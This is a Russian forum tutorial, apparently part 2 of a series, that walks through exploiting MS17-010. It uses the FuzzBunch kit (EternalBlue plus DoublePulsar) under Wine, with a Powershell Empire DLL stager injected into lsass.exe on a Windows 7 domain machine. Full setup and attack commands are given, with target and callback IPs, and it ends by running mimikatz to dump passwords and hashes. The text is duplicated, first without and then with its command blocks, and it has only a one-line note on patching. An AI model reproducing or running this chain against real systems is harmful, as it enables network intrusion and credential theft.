В предыдущей статье (Часть 1) , мы ознакомились с Powershell Empire и вектором атаки через уязвимость браузера IE 9-11. В этой статье мы ознакомимся с вектором атаки с использованием уязвимости MS17-010.
2. Вектор атаки Fuzzbunch (MS17-010)
Второй вектор атаки будет сложнее. Мы будем использовать Fuzzbunch (связку EternalBlue + Doublepulsar). Эксплуатация уязвимости MS17-010.
1. Для установки FuzzBunch нам понадобится либо 32-битная Windows машина, либо Linux с установленным окружением Wine. Мы воспользуемся вторым вариантом, чтобы оба инструмента, Empire и FuzzBunch, находились в одном дистрибутиве.
Для работы FuzzBunch нам понадобится Python 2.6 и, чтобы не захламлять ваше основное окружение Wine, я рекомендую создать новое. Для начала устанавливаем/обновляем Wine:
Дальше нам нужно работать от имени root- пользователя.
Создаем и инициализируем новое окружение:
Оставляем все параметры без изменений, жмем ОК.
Проверяем, что окружение создалось успешно:
Добавляем в PATH требуемые директории
HKEY_CURRENT_USER-Enviroment
добавляем строковый параметр PATH с содержанием
Устанавливаем FuzzBunch в окружение Wine:
Устанавливаем Python 2.6
Устанавливаем pywin32
(тут уменя pywin32-219.win32-py2.6.exe скачался почему-то под именем «pywin32-219.win32-py2.6.exe?r=» , пришлось переименовать)
Постинсталляция:
2. С установкой покончено, теперь можно перейти к действию:
Из окружения Wine выполняем следующую команду:
После запуска видим меню FuzzBunch:
Я использую Parrot OS,и при использовании данного модуля у меня в консоли пропечатывается лишний мусор (если кто знает, в чем причина, подскажите пожалуйста!)
Итак, мы готовы к атаке. Атаковать будем Windows 7 x 64 в доменной сети. На ней установлены прошлогодние обновления за декабрь 2016 и обновленный антивирус 360 Total Security.
Адресс атакуемой машины 10.10.36.5 (адресс атакующего 10.10.100.2)
Указываем
3. Начнем с использования модуля Eternalblue:
На вопрос о проверке параметров отвечаем утвердительно.
Оставляем все без изменения, кроме пункта о методе доставки. Тут выбираем FB.
1) FB
[?] Mode [0]: 1
Подтверждаем выполнение yes
Если видим сообщение Eternalblue Succeeded, значит все прошло успешно.
4. Теперь нам нужно подготовить в качестве механизма доставки dll. Если бы вы использовали Empire на отдельной машине, то для доставки стейджера на машину с FuzzBunch будет удобно сохранить его в каталог веб-сервера и затем скачать по сети. Но поскольку у нас Powershell Empire и FuzzBunch на одной машине, то сохраним файл в корень диска С окружения Wine.
Вернемся в окно Empire:
1) Создаем новый listener (или используем созданный в первом примере)
Теперь нужно создать dll:
где Arch x64/x86 в зависимости от атакуемой системы, OutFile файл dll , который создадим, MyEmpire- имя listenera.
Модифицированная dll успешно создана и лежит в корне С wine.
5. Возвращаемся в FuzzBunch:
Теперь нам нужен модуль DoublePulsar
оставляем все по-умолчанию.
Опционально можно изменить имя процесса, под которым будем внедряться и параметры запуска. Но пока я оставлю все как есть (процесс lsass.exe)
Подтверждаем выполнение
yes.
Выполняем модуль.
И получаем сессию в Empire:
6. Выбираем взаимодействие со свежим агентом
Запускаем встроенный модуль mimikatz:
И получаем все пароли и хэши.
Еще есть полезный модуль creds, который показывает уже полученные пароли удобным списком.
Подробнее с модулями можно ознакомиться на официальном сайте
так же рекомендуется настроить фаервол и закрыть\ фильтровать порты.
PS: Данный раздел был написан основываясь на материале, представленном в статье
О web-интерфейсе к Powershell Empire я напишу в Часть 3
2. Вектор атаки Fuzzbunch (MS17-010)
Второй вектор атаки будет сложнее. Мы будем использовать Fuzzbunch (связку EternalBlue + Doublepulsar). Эксплуатация уязвимости MS17-010.
1. Для установки FuzzBunch нам понадобится либо 32-битная Windows машина, либо Linux с установленным окружением Wine. Мы воспользуемся вторым вариантом, чтобы оба инструмента, Empire и FuzzBunch, находились в одном дистрибутиве.
Код:
git clone github.com/fuzzbunch/fuzzbunch.git
Код:
apt-get instal wine winbindСоздаем и инициализируем новое окружение:
Код:
mkdir ~/.wine_fuzzbunch
WINEPREFIX="/root/.wine_fuzzbunch/" winecfg
Код:
export WINEPREFIX=/root/.wine_fuzzbunch/
Код:
cd ~/.wine_fuzzbunch/
lsДобавляем в PATH требуемые директории
Код:
wine regedit.exeдобавляем строковый параметр PATH с содержанием
Код:
c:\\windows;c:\\system;C:\\Python26;C:\\nsa\windows\fuzzbunch
Код:
mkdir -p ~/.wine_fuzzbunch/drive_c/nsa/windows
cd ~/.wine/drive_c/nsa/windows
cp -R [ваш_каталог_с_fuzzbunch]/* .
wget https://www.python.org/ftp/python/2.6/python-2.6.msi
wget https://downloads.sourceforge.net/project/pywin32/pywin32/Build 219/pywin32-219.win32-py2.6.exe?r=&ts=1493192168&use_mirror=netcologne
Код:
wine msiexec /i python-2.6.msi
Код:
wine pywin32-219.win32-py2.6.exeПостинсталляция:
Код:
wine cmd.exe
cd C:\Python26\Scripts
python pywin32_postinstall.py -install
cd C:\nsa\windows
mkdir listeningpostsИз окружения Wine выполняем следующую команду:
Код:
python fb.pyПосле запуска видим меню FuzzBunch:
Я использую Parrot OS,и при использовании данного модуля у меня в консоли пропечатывается лишний мусор (если кто знает, в чем причина, подскажите пожалуйста!)
Итак, мы готовы к атаке. Атаковать будем Windows 7 x 64 в доменной сети. На ней установлены прошлогодние обновления за декабрь 2016 и обновленный антивирус 360 Total Security.
Адресс атакуемой машины 10.10.36.5 (адресс атакующего 10.10.100.2)
Указываем
Код:
Default Target IP Address : 10.10.36.5
Default Callback IP Address: 10.10.100.2
Use Redirection: no (с параметром yes у меня не завелось)
Base log directory: C:\logs (тут будут логи всех команд и действий с атакуемой машины)
Задаем имя проэкту: parrot_empire
Код:
use EternalblueОставляем все без изменения, кроме пункта о методе доставки. Тут выбираем FB.
Код:
Mode :: Delivery mechanism[?] Mode [0]: 1
Подтверждаем выполнение yes
Если видим сообщение Eternalblue Succeeded, значит все прошло успешно.
4. Теперь нам нужно подготовить в качестве механизма доставки dll. Если бы вы использовали Empire на отдельной машине, то для доставки стейджера на машину с FuzzBunch будет удобно сохранить его в каталог веб-сервера и затем скачать по сети. Но поскольку у нас Powershell Empire и FuzzBunch на одной машине, то сохраним файл в корень диска С окружения Wine.
Вернемся в окно Empire:
1) Создаем новый listener (или используем созданный в первом примере)
Теперь нужно создать dll:
Код:
usestager dll MyEmpire
set Arch x64
set OutFile /root/.wine_fuzzbunch/drive_c/launcer64.dll
executeМодифицированная dll успешно создана и лежит в корне С wine.
5. Возвращаемся в FuzzBunch:
Теперь нам нужен модуль DoublePulsar
Код:
use DoublePulsar
Код:
Protocol SMB
Architecture 1 (x64) - меняем архитектуру
Function: 2 - В качестве функции выбираем ddl , созданную в Empire
DllPayload: C:\launcher64.dllПодтверждаем выполнение
yes.
Выполняем модуль.
И получаем сессию в Empire:
6. Выбираем взаимодействие со свежим агентом
Код:
interact BWUEHDPACARXAW3Y
Код:
mimikatzЕще есть полезный модуль creds, который показывает уже полученные пароли удобным списком.
Подробнее с модулями можно ознакомиться на официальном сайте
Ссылка скрыта от гостей
Защита
UPD: уязвимость MS17-010 закрыта в
Ссылка скрыта от гостей
.так же рекомендуется настроить фаервол и закрыть\ фильтровать порты.
PS: Данный раздел был написан основываясь на материале, представленном в статье
Ссылка скрыта от гостей
Ссылка скрыта от гостей
О web-интерфейсе к Powershell Empire я напишу в Часть 3
Последнее редактирование модератором:
